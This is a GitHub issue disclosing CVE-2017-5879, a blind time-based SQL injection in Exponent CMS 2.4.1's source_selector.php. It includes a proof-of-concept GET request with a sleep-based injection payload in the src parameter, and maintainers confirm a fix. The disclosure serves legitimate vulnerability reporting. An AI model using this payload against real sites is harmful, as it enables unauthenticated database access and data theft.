Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Time Based SQL Injection Exponent CMS 2.4.1 and others versions #73

Closed
Belladona-c0re opened this issue Feb 6, 2017 · 3 comments
Closed

Comments

@Belladona-c0re
Copy link

Belladona-c0re commented Feb 6, 2017

CVE-2017-5879

This is a blind SQL injection that can be exploited by un-authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out-of-band technique, such as select_loadfile(). The vulnerability affects source_selector.php andthe following parameter: src.

PoC example:

GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\' HTTP/1.1
Host: localhost
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close

poc
How to fix: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

@dleffler
Copy link
Collaborator

Fixed in latest code push, to be released in next patch or version

@galaktipus
Copy link

Is there any commit for the issue?

@dleffler
Copy link
Collaborator

This was fixed with push 85c1b9f, it was distributed with v2.4.1 Patch #2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants